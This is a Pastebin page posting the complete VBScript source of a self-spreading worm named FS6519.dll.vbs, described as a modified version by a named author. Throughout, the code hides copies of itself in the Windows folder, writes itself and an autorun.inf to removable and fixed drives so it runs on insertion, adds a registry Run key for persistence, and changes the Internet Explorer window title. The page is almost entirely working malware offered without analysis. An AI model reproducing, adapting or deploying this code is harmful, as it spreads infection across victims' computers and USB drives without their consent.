Advertisement
FlyFar

FS6519.dll.vbs

Feb 24th, 2023
1,549
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VBScript 2.19 KB | Cybersecurity | 0 0
  1. 'For those people who thought that the "TAGA LIPA ARE" author wants to claim
  2. 'that the script was originally written by him,
  3. 'well, all I can say is please read the source code below carefully and
  4. 'hope you guys will notice the word "MODIFIED" there. Thank you. :D
  5. '-----------------------------------------------------------------------------------------------------------------------------------
  6.  
  7. 'THIS IS A MODIFIED VERSION BY: F. E. SILVA
  8. 'MABUHAY ANG LIPA
  9. on error resume next
  10. dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
  11. atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe FS6519.dll.vbs"
  12. set fs = createobject("Scripting.FileSystemObject")
  13. set mf = fs.getfile(Wscript.ScriptFullname)
  14. dim text,size
  15. size = mf.size
  16. check = mf.drive.drivetype
  17. set text=mf.openastextstream(1,-2)
  18. do while not text.atendofstream
  19. mysource=mysource&text.readline
  20. source=mysource & vbcrlf
  21. loop
  22. do
  23. Set winpath = fs.getspecialfolder(0)
  24. set tf = fs.getfile(winpath & "\FS6519.dll.vbs")
  25. tf.attributes = 32
  26. set tf=fs.createtextfile(winpath & "\FS6519.dll.vbs",2,true)
  27. tf.write mysource
  28. tf.close
  29. set tf = fs.getfile(winpath & "\FS6519.dll.vbs")
  30. tf.attributes = 39
  31. for each flashdrive in fs.drives
  32. If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
  33. set tf=fs.getfile(flashdrive.path &"\FS6519.dll.vbs")
  34. tf.attributes =32
  35. set tf=fs.createtextfile(flashdrive.path &"\FS6519.dll.vbs",2,true)
  36. tf.write mysource
  37. tf.close
  38. set tf=fs.getfile(flashdrive.path &"\FS6519.dll.vbs")
  39. tf.attributes =39
  40. set tf =fs.getfile(flashdrive.path &"\autorun.inf")
  41. tf.attributes = 32
  42. set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
  43. tf.write atr
  44. tf.close
  45. set tf =fs.getfile(flashdrive.path &"\autorun.inf")
  46. tf.attributes=39
  47. end if
  48. next
  49. set rg = createobject("WScript.Shell")
  50. rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\FS6519",winpath&"\FS6519.dll.vbs"
  51. rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","TAGA LIPA ARE!"
  52. if check <> 1 then
  53. Wscript.sleep 200000
  54. end if
  55. loop while check<>1
  56. set sd = createobject("Wscript.shell")
  57. sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
Tags: lipa
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement